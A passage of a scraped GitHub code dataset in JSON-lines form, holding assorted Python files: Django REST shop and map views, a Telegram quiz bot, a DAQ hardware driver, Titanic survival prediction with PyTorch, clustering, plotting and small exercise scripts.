stc.ST_AffinityPropagation(**kwargs) \n #elif algorithm == 'birch':\n # clusterer = stc.ST_BIRCH(**kwargs)\n else:\n raise ValueError('Unknown algorithm. Choose between dbscan, hdbscan, agglomerative, kmeans, optics, spectral, affinitypropagation, birch.')\n\n if not is_numeric_dtype(data['time'][0]): # if time format not integer\n grouped_data = data.groupby('time')\n keys = []\n for key in grouped_data.groups.keys():\n keys.append(key)\n time_distance = keys[1] - keys[0]\n\n for i in range(1, len(keys)): # check if time is equidistant\n if keys[i] - keys[i - 1] != time_distance:\n warnings.warn(\n 'As difference between timestamps is not equidistant, clustering of this data is not supported by movekit at the moment.')\n return\n\n # convert time to integer\n time_values = np.array(data['time'])\n time_values = np.unique(time_values)\n indices = np.sort(time_values)\n converter = {}\n for i in range(len(time_values)):\n converter[indices[i]] = i\n data = data.replace({'time': converter})\n\n if presence_3d(data):\n data = data.loc[:, ['time','x','y','z']].values\n else:\n data = data.loc[:, ['time','x','y']].values\n clusterer.st_fit_frame_split(data, frame_size) # percentage bar not possible\n return clusterer.labels\n","repo_name":"dbvis-ukon/movekit","sub_path":"src/movekit/clustering.py","file_name":"clustering.py","file_ext":"py","file_size_in_byte":20251,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"32"} +{"seq_id":"70882605212","text":"from django.shortcuts import render\nfrom django.http import Http404\nfrom django.core.urlresolvers import reverse, NoReverseMatch\n\n\n# view should be the name of the url from the rest api\ndef map_view(request, view='pops', city=None, location=None):\n if view:\n try:\n # raise Exception\n if city:\n if location:\n url = reverse('api:' + view, args=(city, location,))\n else:\n url = reverse('api:' + view, args=(city,))\n else:\n url = reverse('api:' + view)\n except NoReverseMatch:\n raise Http404\n if request.GET.get('tag'):\n return render(request, 'pops/map.html', {'view': '%s?tag=%s' % (url, request.GET.get('tag')), 'filter': request.GET.get('tag')})\n else:\n return render(request, 'pops/map.html', {'view': url})\n","repo_name":"grnet/pops","sub_path":"views/pops_views.py","file_name":"pops_views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"71689222491","text":"'''\n 加载excel用例\n'''\nimport sys\nimport openpyxl\n\n\ndef open_case_excel():\n case_list = []\n\n wb = openpyxl.load_workbook('../datas/demo.xlsx') # 打开excel\n sheet = wb['demo']\n print(sheet.max_row) # 最大行数\n print(sheet.max_column) # 最大列数\n\n # 获取参数标题\n case_key = []\n for i in range(1, sheet.max_column + 1):\n case_key.append(sheet.cell(1, i).value)\n\n # 获取将excel中的用例添加到列表字典中\n row = 2\n while row <= sheet.max_row:\n case_row = {}\n for i in range(1, sheet.max_column + 1):\n case_row[case_key[i - 1]] = sheet.cell(row, i).value\n case_list.append(case_row)\n row += 1\n\n # 构造pytest参数化的集合\n test_case_list = []\n for i in range(0, len(case_list)):\n case = (\n case_list[i]['method'],\n case_list[i]['api'],\n (case_list[i]['request_params']),\n (case_list[i]['request_data']),\n (case_list[i]['headers'])\n )\n test_case_list.append(case)\n return test_case_list\n\n\nif __name__ == \"__main__\":\n file_name = str(sys.argv[1])\n open_case_excel(file_name)\n","repo_name":"Jaden-Yu/pytest_test","sub_path":"scripts/api_test/model/case_to_excel.py","file_name":"case_to_excel.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"70152827293","text":"import matplotlib.pyplot as plt\nimport normalization\nimport numpy as np\nimport gradient_descent\n\ndef display_predictions(thetas, dataX):\n for i in range(len(dataX)):\n p = thetas[0] + thetas[1] * dataX[i]\n print(\"dataX[\" + str(i) + \"] = \" + str(dataX[i]) + \" & prediction = \" + str(p))\n print(\"\")\n\ndef start_output(raw_dataX, raw_dataY, X, Y, theta, Normalize):\n if Normalize == True:\n tmp_X, tmp_Y, t = normalization.denormalize(raw_dataX, raw_dataY, X.copy(), Y.copy(), theta.copy(), True)\n c = gradient_descent.cost_function(tmp_X, tmp_Y, t)\n else:\n c = gradient_descent.cost_function(X, Y, theta)\n t = theta\n print(\"Starting t0 = \" + str(t[1][0]) + \"\\nStarting t1 = \" + str(t[0][0]))\n print(\"Cost = \" + str(c) + \"\\n\")\n\ndef end_output(theta, cost, X, Display_predictions):\n print(\"Finished gradient descent !\\n\")\n if (Display_predictions == True):\n print(\"Model predictions :\")\n print(X.dot(theta))\n print(\"Final t0 = \" + str(theta[1][0]))\n print(\"Final t1 = \" + str(theta[0][0]))\n print(\"Cost = \" + str(cost))\n\ndef display_graph(dataX, dataY, all_predictions, Display_graph):\n if Display_graph == True:\n plt.scatter(dataX, dataY, c='k')\n plt.plot(dataX, all_predictions[0], c='r')\n plt.plot(dataX, all_predictions[1], c='y')\n plt.plot(dataX, all_predictions[2], c='g')\n plt.show()","repo_name":"alacrois/42-ft_linear_regression","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":1410,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"24131936797","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Aug 9 14:56:33 2019\n@author: spidey\n\"\"\"\n\nimport cv2\n\ncam = cv2.VideoCapture(0)\n\ncv2.namedWindow(\"test\")\n'''\ndef gstreamer_pipeline (capture_width=1280, capture_height=1080, display_width=800, display_height=600, framerate=30, flip_method=0) : \n return ('nvarguscamerasrc ! ' \n 'video/x-raw(memory:NVMM), '\n 'width=(int)%d, height=(int)%d, '\n 'format=(string)NV12, framerate=(fraction)%d/1 ! '\n 'nvvidconv flip-method=%d ! '\n 'video/x-raw, width=(int)%d, height=(int)%d, format=(string)BGRx ! '\n 'videoconvert ! '\n 'video/x-raw, format=(string)BGR ! appsink' % (capture_width,capture_height,framerate,flip_method,display_width,display_height))\n'''\n#cap = cv2.VideoCapture(gstreamer_pipeline(flip_method=0), cv2.CAP_GSTREAMER)\nimg_counter = 0\n\nwhile True:\n ret, frame = cam.read()\n frame=cv2.rotate(frame, cv2.ROTATE_180)\n cv2.imshow(\"test\", frame)\n if not ret:\n break\n k = cv2.waitKey(1)\n\n if k%256 == 27:\n # ESC pressed\n print(\"Escape hit, closing...\")\n break\n elif k%256 == 32:\n # SPACE pressed\n img_name = \"opencv_frame_{}.png\".format(img_counter)\n cv2.imwrite(img_name, frame)\n print(\"{} written!\".format(img_name))\n img_counter += 1\n\ncam.release()\n\ncv2.destroyAllWindows()","repo_name":"bathonSpidey/RaspberryFiles","sub_path":"all_codes/Sign Detection/click_pic.py","file_name":"click_pic.py","file_ext":"py","file_size_in_byte":1354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"4743315353","text":"def main():\n matriz = []\n nlin = int(input(\"Digite o numero de linhas da matriz: \"))\n ncol = int(input(\"Digite o numero de colunas da matriz: \"))\n carrega_matriz(matriz, nlin, ncol)\n print(f\"A média dos elementos da matriz é {calcula_media_matriz (matriz,nlin,ncol):.2f}\")\n exibe_impares(matriz, nlin, ncol)\n\n\n\ndef carrega_matriz (matriz,nlin,ncol):\n for lin in range (nlin):\n linha = []\n for col in range (ncol):\n linha.append(int(input(\"Digite o elemento da matriz: \")))\n matriz.append(linha)\n\ndef calcula_media_matriz (matriz,nlin,ncol):\n soma = 0\n for lin in range (nlin):\n for col in range (ncol):\n soma+=matriz[lin][col]\n\n media = soma / (nlin * ncol)\n return (media)\n\ndef exibe_impares (matriz,nlin,ncol):\n for lin in range (nlin):\n for col in range (ncol):\n if (matriz[lin][col] % 2 != 0):\n print(matriz[lin][col])\n\nif (__name__ == \"__main__\"):\n main()","repo_name":"gabrielgirami2/Python","sub_path":"revisao_funcoes/exemplos_funcoes/programas/exercicios/exercicio2.py","file_name":"exercicio2.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"18870845558","text":"import sys\nimport requests\nimport traceback\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework import authentication, permissions\nfrom rest_framework.authentication import SessionAuthentication\nfrom django.core.exceptions import ValidationError\nfrom django.contrib.auth import get_user_model, authenticate, logout, login\nfrom django.utils.translation import gettext_lazy as _\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.utils.decorators import method_decorator\nfrom django.db import transaction\nfrom shopapp.models import CustomUser, UserType, Product, Cart, Order, ProductRating\nfrom django.shortcuts import render, redirect\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom ..serializers import (\n CustomerSerializer,\n CreateCustomerSerializer,\n CustomerProductListSerializer,\n CustomerCartSerializer,\n CustomerOrderProductSerializer,\n CustomerOrderListSerializer,\n)\n\nfrom ..services import (\n create_customer,\n create_order,\n)\n\n\nclass CustomerLoginAPI(APIView):\n \"\"\"API for Admin Login.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n def post(self, request):\n serializer = CustomerSerializer(data=request.data)\n if serializer.is_valid():\n username = serializer.validated_data['username']\n password = serializer.validated_data['password']\n user = authenticate(request, username=username, password=password)\n if user is not None and user.user_type == UserType.CUSTOMER:\n # Login successful, return user data\n login(request, user)\n data = {\n \"Success\": True,\n \"msg\": \"Login Success\",\n }\n return Response(status=status.HTTP_201_CREATED, data=data)\n # return redirect(\"shopapp:customer_list\") \n else:\n # Login failed\n return Response({'error': 'Invalid login credentials'}, status=status.HTTP_401_UNAUTHORIZED)\n else:\n # Invalid data\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST) \n\n\nclass CustomerLogOutAPI(APIView):\n \"\"\"API for Logout.\"\"\"\n def get(self, request):\n logout(request)\n return redirect(\"shopapp:customer_login\") \n\n\nclass CustomerRegisterAPI(APIView):\n \"\"\"API for creating User\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n def post(self, request):\n try:\n serializer = CreateCustomerSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n with transaction.atomic():\n create_customer(**serializer.validated_data)\n return Response(status=status.HTTP_201_CREATED, data=_(\"User created succesfully.\"))\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"User Registration Failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass CustomerProductListAPI(APIView):\n \"\"\"API for getting Product list.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n try:\n result = Product.objects.all().values(\"id\", \"name\", \"description\", \"price\").order_by(\"-created_date\")\n serializer = CustomerProductListSerializer(result, many=True)\n return Response(status=status.HTTP_200_OK, data=serializer.data)\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"List getting failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass AddtoCartAPI(APIView):\n \"\"\"API for adding to cart.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def post(self, request, id):\n product = Product.objects.get(pk=id)\n cart, _ = Cart.objects.get_or_create(user=request.user)\n cart.products.add(product)\n return Response({'message': 'Product added to cart'}) \n\n\nclass CustomerCartViewAPI(APIView):\n \"\"\"API for getting Cart list.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n cart, _ = Cart.objects.get_or_create(user=request.user)\n serializer = CustomerCartSerializer(cart)\n return Response(serializer.data) \n\n\nclass CustomerOrderProductAPI(APIView):\n \"\"\"API for creating order for Customer\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n user = request.user\n try:\n serializer = CustomerOrderProductSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n with transaction.atomic():\n create_order(user=user, **serializer.validated_data)\n data = {\n \"Success\": True,\n \"msg\": \"New order created.\",\n }\n return Response(status=status.HTTP_200_OK, data=data)\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"Creating order failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass CustomerOrderListAPI(APIView):\n \"\"\"API for getting order list.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def get(self, request):\n user = request.user\n try:\n result = Order.objects.filter(user=user).values(\"id\", \"product__name\", \"status\", \"quantity\").order_by(\"-created_date\")\n serializer = CustomerOrderListSerializer(result, many=True)\n return Response(status=status.HTTP_200_OK, data=serializer.data)\n except ValidationError as e:\n mes = \"\\n\".join(e.messages)\n raise ValidationError(mes)\n except Exception:\n error_info = \"\\n\".join(traceback.format_exception(*sys.exc_info()))\n print(error_info)\n data = {\n \"Success\": False,\n \"msg\": \"List getting failed\",\n }\n return Response(status=status.HTTP_400_BAD_REQUEST, data=data) \n\n\nclass CustomerProductReviewAPI(APIView):\n \"\"\"API for product review.\"\"\"\n\n authentication_classes = [SessionAuthentication]\n\n permission_classes = [IsAuthenticated]\n\n def post(self, request, id):\n product = Product.objects.get(pk=id)\n rating = request.data.get('rating', 0)\n ProductRating.objects.create(user=request.user, product=product, rating=rating)\n return Response({'message': 'Product rated successfully'}) ","repo_name":"Shanidh/shop","sub_path":"shopapp/apis/customer.py","file_name":"customer.py","file_ext":"py","file_size_in_byte":7699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"20847056747","text":"\"\"\"Drivers for National Instrument hardware.\n\nThe materials supported is the one supported by NI-DAQmx on Windows and\ncomedi on Linux.\n\nNote:\n - The driver depends on `pycomedi `_\n on Linux or `PyLibNIDAQmx `_\n on Windows.\n - The driver requires `numpy` on all platform.\n\nReference:\n - `NI-DAQmx Software `_\n - `comedi `_\n\n\"\"\"\nimport sys\n\nif sys.platform == \"linux2\":\n from lindaq import DioProtocol, AioProtocol\nelse:\n from windaq import DioProtocol\n from windaq import VoltageAioProtocol as AioProtocol\n\nimport pyhard2.driver as drv\nAccess = drv.Access\n\n\n# NI 622x range | precision\n# -10.0 to +10.0 V -> 320 muV\n# -5.0 to +5.0 V -> 160 muV\n# -1.0 to +1.0 V -> 32 muV\n# -0.2 to +0.2 V -> 6.4 muV\n\n\nclass Cmd(drv.Command):\n\n \"\"\"`Command` without `reader`.\"\"\"\n\n class Context(drv.Context):\n\n \"\"\"`Context` with `minimum` and `maximum` attributes.\"\"\"\n\n def __init__(self, command, value=None, node=None):\n super(Cmd.Context, self).__init__(command, value, node)\n self.minimum = command.minimum\n self.maximum = command.maximum\n\n def __init__(self, **kwargs):\n super(Cmd, self).__init__(reader=None, **kwargs)\n\n\nclass Subsystem(drv.Subsystem):\n\n \"\"\"A subsytem with a `device` attribute.\n\n Args:\n device (string): The device name.\n\n \"\"\"\n def __init__(self, device, parent=None):\n super(Subsystem, self).__init__(parent)\n self.device = device\n\n\nclass Daq(drv.Subsystem):\n\n \"\"\"Driver for DAQ hardware.\n\n On windows, the node names are ``portN/lineM`` for the digital\n in/out channels and ``aiN`` or ``aoN`` for the analog input and\n output.\n\n On linux, the node names are ``SUBDEVICE.CHANNEL``, that is the\n number of the `subdevice` and of the `channel` separated with a dot\n ``.``.\n\n Args:\n device (str): The name of the device on windows or its address\n (example ``/dev/comedi0``) on linux.\n\n .. graphviz:: gv/Daq.txt\n\n Example:\n NI 622x cards have following nodes:\n\n - 32 AI channels: ai[0-31]\n - 4 AO channels: ao[0-3]\n - 32 DIO channels on port0: port0/line[0-31]\n - 8 DIO channels on port1: port1/line[0-7]\n - 8 DIO channels on port2: port2/line[0-7]\n\n Use as follows\n\n >>> driver = Daq(\"NAME\") # The actual device name\n >>> driver.state.read(\"port0/line3\") # windows names\n ... False\n >>> driver.state.write(True, \"port0/line3\")\n >>> driver.state.read(\"port0/line3\")\n ... True\n >>> driver.voltage.ai.read(\"ai0\")\n ... 0.5\n >>> driver.voltage.ao.write(1.0, \"ao0\")\n\n \"\"\"\n def __init__(self, device, parent=None):\n super(Daq, self).__init__(parent)\n self.digitalIO = Subsystem(device, self)\n self.digitalIO.setProtocol(DioProtocol(self))\n self.digitalIO.state = Cmd(rfunc=bool, access=Access.RW)\n self.voltage = Subsystem(device, self)\n self.voltage.setProtocol(AioProtocol(self))\n self.voltage.ai = Cmd(minimum=-10, maximum=10, access=Access.RO)\n self.voltage.ao = Cmd(minimum=-10, maximum=10, access=Access.WO)\n\n","repo_name":"Synss/pyhard2","sub_path":"pyhard2/driver/daq/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"4709208923","text":"import pandas as pd\r\nimport torch\r\nfrom torch.utils.data import Dataset, DataLoader\r\nimport torch.nn as nn\r\nfrom sklearn.preprocessing import StandardScaler\r\n\r\n# Loading the Test Dataset\r\ndata = pd.read_csv('Titanic/Data/test.csv')\r\nsubmission = data\r\n\r\n# Dropping Columns that we are guess are irrelevant\r\ndata = data.drop(['Name', 'Ticket', 'Cabin'], axis=1)\r\nsubmission = submission.drop(['Pclass', 'Name', 'Sex', 'Age',\r\n 'SibSp', 'Parch', 'Ticket', 'Fare', 'Cabin', 'Embarked'], axis=1)\r\n\r\n# Giving Sex and Embarked Numerical Values\r\ndata[\"Sex\"] = data[\"Sex\"].astype('category').cat.codes\r\ndata[\"Embarked\"] = data[\"Embarked\"].astype('category').cat.codes\r\n\r\n# Replacing Entries with Missing Elements with The Median\r\ndata = data.apply(pd.to_numeric, errors='coerce')\r\ndata = data.fillna(data.mean())\r\n\r\n# Exclude the PassengerId Column\r\ndata = data.iloc[:, 1:]\r\n\r\nprint(data.head())\r\n\r\n# Standardize Input\r\nscaler = StandardScaler()\r\ninput = scaler.fit_transform(data)\r\n\r\nx = data.iloc[:, 1:-1]\r\n\r\n# Ensure PyTorch is Using our GPU\r\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\r\nprint('Device: ' + str(device))\r\n\r\n\r\nclass testData(Dataset):\r\n def __init__(self, X_data):\r\n self.X_data = X_data\r\n\r\n def __getitem__(self, index):\r\n return self.X_data[index]\r\n\r\n def __len__(self):\r\n return len(self.X_data)\r\n\r\n\r\ntest_data = testData(torch.FloatTensor(input))\r\n\r\n# Initialize the Dataloaders\r\ntest_loader = DataLoader(dataset=test_data, batch_size=1)\r\n\r\nLAYER_NODES = 6\r\n\r\n# Define our Neural Network Architecture\r\n\r\n\r\nclass binaryClassification(nn.Module):\r\n def __init__(self):\r\n super(binaryClassification, self).__init__()\r\n # Number of input features is 7.\r\n self.layer_1 = nn.Linear(7, LAYER_NODES)\r\n self.layer_2 = nn.Linear(LAYER_NODES, LAYER_NODES)\r\n self.layer_out = nn.Linear(LAYER_NODES, 1)\r\n\r\n self.relu = nn.ReLU()\r\n self.dropout = nn.Dropout(p=0.2)\r\n self.batchnorm1 = nn.BatchNorm1d(LAYER_NODES)\r\n self.batchnorm2 = nn.BatchNorm1d(LAYER_NODES)\r\n\r\n def forward(self, inputs):\r\n x = self.relu(self.layer_1(inputs))\r\n x = self.batchnorm1(x)\r\n x = self.relu(self.layer_2(x))\r\n x = self.batchnorm2(x)\r\n x = self.dropout(x)\r\n x = self.layer_out(x)\r\n\r\n return x\r\n\r\n\r\n# Initialize our Optimizer and Choose a Loss Function\r\nmodel = torch.load('Titanic/trained_model')\r\nmodel.to(device)\r\n\r\n# Testing our Model\r\ny_pred_list = []\r\nmodel.eval()\r\n\r\nwith torch.no_grad():\r\n for X_batch in test_loader:\r\n X_batch = X_batch.to(device)\r\n y_test_pred = model(X_batch)\r\n y_test_pred = torch.sigmoid(y_test_pred)\r\n y_pred_tag = torch.round(y_test_pred)\r\n y_pred_list.append(y_pred_tag.cpu().numpy())\r\n\r\ny_pred_list = [int(a.squeeze().tolist()) for a in y_pred_list]\r\n\r\n# Save Our Results into The Submission DataFrame and to CSV\r\nsubmission.insert(len(submission.columns), 'Survived', y_pred_list)\r\nsubmission.to_csv('Titanic/Data/Submission.csv', index=False)\r\nprint(submission.head())\r\nprint(submission.shape)\r\n","repo_name":"camandrewz/TitanicML","sub_path":"Code/prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":3152,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"72043175130","text":"import os\nimport logging\n\nfrom CreateQuestions import Interviewer\nfrom SaveChatID import set_chat_id, set_url,set_inspect_answer, check_data\nimport psycopg2\n\nfrom aiogram import Bot, Dispatcher, types\nfrom aiogram.utils import executor\nfrom dotenv import load_dotenv\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\n\nfrom ParsSite import Parser\nconn = psycopg2.connect(\n host=\"localhost\",\n port=\"5432\",\n database=\"postgres\",\n user=\"postgres\",\n password=\"root\")\n# Создание курсора для работы с базой данных\ncur = conn.cursor()\n\n\nstorage = MemoryStorage()\n\nfrom aiogram.types import ReplyKeyboardMarkup, KeyboardButton\n\ndef markup(answers):\n # Создание кнопок\n markup = ReplyKeyboardMarkup(resize_keyboard=True)\n\n if answers:\n button1 = KeyboardButton(answers[0])\n button2 = KeyboardButton(answers[1])\n button3 = KeyboardButton(answers[2])\n button4 = KeyboardButton(answers[3])\n markup.row(button1, button2)\n markup.row(button3, button4)\n\n button5 = KeyboardButton('/start')\n button6 = KeyboardButton('/question')\n button7 = KeyboardButton('/data')\n button8 = KeyboardButton('/help')\n\n markup.row(button6, button7, button5, button8)\n return markup\n\n# Создание клавиатуры с кнопками\n\nload_dotenv() # загрузить переменные из .env файла\nTOKEN = os.getenv('TOKEN') # получить значение переменной API_KEY\n\n# Устанавливаем уровень логирования\nlogging.basicConfig(level=logging.INFO)\n\n# Создаем объект бота\nbot = Bot(token=TOKEN)\n\n# Создаем объект диспетчера\ndp = Dispatcher(bot, storage=storage)\n\n# Обработчик команды /start\n@dp.message_handler(commands=['start'])\nasync def send_welcome(message: types.Message,state: FSMContext):\n await state.finish()\n await set_chat_id(message, conn=conn, cur=cur)\n await message.reply(\"Привет! Я бот, который может задавать тебе вопросы.\")\n await bot.send_message(message.chat.id, \"Выберите действия\" ,reply_markup=markup(False))\n await message.delete()\n\n\n# Обработчик команды /question\n@dp.message_handler(commands=['question'])\nasync def process_question_command(message: types.Message):\n await set_chat_id(message, conn=conn, cur=cur)\n # Выбираем случайный вопрос из списка\n question = Interviewer().question(message)\n Interviewer().log_question(question)\n # Создаем сообщение с вопросом и вариантами ответов\n text = f\"{question['question']}\"\n await message.answer(text)\n await bot.send_message(message.chat.id, \"Введите Ваш ответ:\", reply_markup=markup(question['options']))\n await dp.current_state(chat=message.chat.id, user=message.from_user.id).set_state('waiting_for_answer')\n await dp.current_state(chat=message.chat.id, user=message.from_user.id).update_data(question=question)\n\n# Обработчик ответа на вопрос\n@dp.message_handler(state='waiting_for_answer')\nasync def process_answer(message: types.Message, state: FSMContext):\n await set_chat_id(message, conn=conn, cur=cur)\n # Получаем контекст пользователя\n data = await state.get_data()\n question = data['question']\n # Проверяем ответ пользователя\n if message.text == question['answer']:\n await set_inspect_answer(id_user = message.chat.id,answer = question['answer'], right = True, conn=conn, cur=cur)\n await message.answer(\"Правильно!\")\n else:\n await set_inspect_answer(id_user = message.chat.id,answer = question['answer'], right = False, conn=conn, cur=cur)\n await message.answer(f\"Неправильно, верный ответ - {question['answer']}\")\n await state.finish()\n\n@dp.message_handler(commands=['data'])\nasync def send_welcome(message: types.Message):\n await set_chat_id(message, conn=conn, cur=cur)\n await message.reply(\"Давайте загрузим текст, который нужно перевести(на данный момент я могу принимать только URL сайта, но скоро я стану лучше:))\")\n await dp.current_state(chat=message.chat.id, user=message.from_user.id).set_state('waiting_data')\n await message.delete()\n\n@dp.message_handler(state='waiting_data')\nasync def process_download(message: types.Message, state: FSMContext):\n await set_url(message, conn=conn, cur=cur)\n await state.finish()\n\ndef main():\n try:\n executor.start_polling(dp, skip_updates=True)\n finally:\n cur.close()\n conn.close()\n# Запускаем бота\nif __name__ == '__main__':\n main()\n","repo_name":"esenin9426/HTML_trans_test","sub_path":"TelegramBot.py","file_name":"TelegramBot.py","file_ext":"py","file_size_in_byte":4980,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28290125344","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom sklearn.metrics import roc_curve, precision_recall_curve, roc_auc_score, average_precision_score\r\n\r\n\r\ndef plot_roc_curve(model, X, y, sample_size, n_samples, title=None, ax=None):\r\n \"\"\"\r\n Plot a ROC curve with SD\r\n :param model: Predictive model\r\n :param X: Feature matrix\r\n :param y: Target labels\r\n :param sample_size: Size of each random sample of examples from X to calculate SD\r\n :param n_samples: Number of random samples of examples from X to calculate SD\r\n :param title: Figure's title\r\n :param ax: Figure's axis\r\n \"\"\"\r\n if title is None:\r\n title = 'ROC Curve'\r\n if ax is None:\r\n plt_show = True\r\n fig, ax = plt.subplots(figsize=(8, 6))\r\n else:\r\n plt_show = False\r\n\r\n pool = np.arange(y.shape[0])\r\n tprs = []\r\n x_vals = np.linspace(0, 1, 100)\r\n\r\n for i in range(n_samples):\r\n sample = np.random.choice(pool, size=sample_size, replace=False)\r\n sample_pred_probs = model.predict_proba(X.iloc[sample, :])[:, 1]\r\n sample_true = y.iloc[sample]\r\n\r\n fpr_arr, tpr_arr, threshold = roc_curve(sample_true, sample_pred_probs)\r\n\r\n interp_tpr = np.interp(x_vals, fpr_arr, tpr_arr)\r\n interp_tpr[0] = 0\r\n tprs.append(interp_tpr)\r\n\r\n y_pred_probs = model.predict_proba(X)[:, 1]\r\n\r\n fpr_arr, tpr_arr, threshold = roc_curve(y, y_pred_probs)\r\n area = roc_auc_score(y, y_pred_probs)\r\n interp_tpr = np.interp(x_vals, fpr_arr, tpr_arr)\r\n interp_tpr[0] = 0\r\n\r\n std_tpr = np.std(tprs, axis=0)\r\n tprs_upper = np.minimum(interp_tpr + std_tpr, 1)\r\n tprs_lower = np.maximum(interp_tpr - std_tpr, 0)\r\n\r\n ax.plot(x_vals, interp_tpr, color='b', label='ROC Curve (AUC = %0.2f)' % area)\r\n ax.plot([0,1], [0,1], '--', color='orange', label='Luck (AUC = 0.5)')\r\n ax.fill_between(x_vals, tprs_lower, tprs_upper, color='grey', label='SD')\r\n ax.set_title(title)\r\n ax.set_xlabel('FPR')\r\n ax.set_ylabel('TPR')\r\n ax.legend(loc='lower right')\r\n\r\n if plt_show:\r\n plt.show()\r\n\r\n\r\ndef plot_pr_curve(model, X, y, sample_size, n_samples, title=None, ax=None):\r\n \"\"\"\r\n Plot a PR curve with SD\r\n :param model: Predictive model\r\n :param X: Feature matrix\r\n :param y: Target labels\r\n :param sample_size: Size of each random sample of examples from X to calculate SD\r\n :param n_samples: Number of random samples of examples from X to calculate SD\r\n :param title: Figure's title\r\n :param ax: Figure's axis\r\n \"\"\"\r\n if title is None:\r\n title = 'PR Curve'\r\n if ax is None:\r\n plt_show = True\r\n fig, ax = plt.subplots(figsize=(8, 6))\r\n else:\r\n plt_show = False\r\n\r\n pool = np.arange(y.shape[0])\r\n precisions = []\r\n x_vals = np.linspace(0, 1, 100)\r\n\r\n for i in range(n_samples):\r\n sample = np.random.choice(pool, size=sample_size, replace=False)\r\n sample_pred_probs = model.predict_proba(X.iloc[sample, :])[:, 1]\r\n sample_true = y.iloc[sample]\r\n\r\n precision_arr, recall_arr, thresholds = precision_recall_curve(sample_true, sample_pred_probs)\r\n\r\n interp_precision = np.interp(x_vals, recall_arr[::-1], precision_arr[::-1])\r\n interp_precision[0] = 1\r\n precisions.append(interp_precision)\r\n\r\n y_pred_probs = model.predict_proba(X)[:, 1]\r\n\r\n precision_arr, recall_arr, thresholds = precision_recall_curve(y, y_pred_probs)\r\n area = average_precision_score(y, y_pred_probs)\r\n interp_precision = np.interp(x_vals, recall_arr[::-1], precision_arr[::-1])\r\n interp_precision[0] = 1\r\n\r\n std_precision = np.std(precisions, axis=0)\r\n precisions_upper = np.minimum(interp_precision + std_precision, 1)\r\n precisions_lower = np.maximum(interp_precision - std_precision, 0)\r\n\r\n ax.plot(x_vals, interp_precision, color='b', label='Avg precision score = %0.2f' % area)\r\n ax.fill_between(x_vals, precisions_lower, precisions_upper, color='grey', label='SD')\r\n ax.plot(x_vals, [(sum(y) / len(y)) for _ in x_vals], '--', color='orange', label='Baseline precision score = %0.2f' % (sum(y) / len(y)))\r\n ax.set_title(title)\r\n ax.set_xlabel('Recall')\r\n ax.set_ylabel('Precision')\r\n ax.legend(loc='upper right')\r\n\r\n if plt_show:\r\n plt.show()\r\n","repo_name":"Markfesenk0/MLHC-Project","sub_path":"project/plotting.py","file_name":"plotting.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1033345362","text":"a = int(input('Kérlek adj meg egy szémot: '))\n\ni = 0\ns = 0\no = 0\nwhile i < a:\n i = i + 1\n if a%i == 0:\n o += i\n s = s + 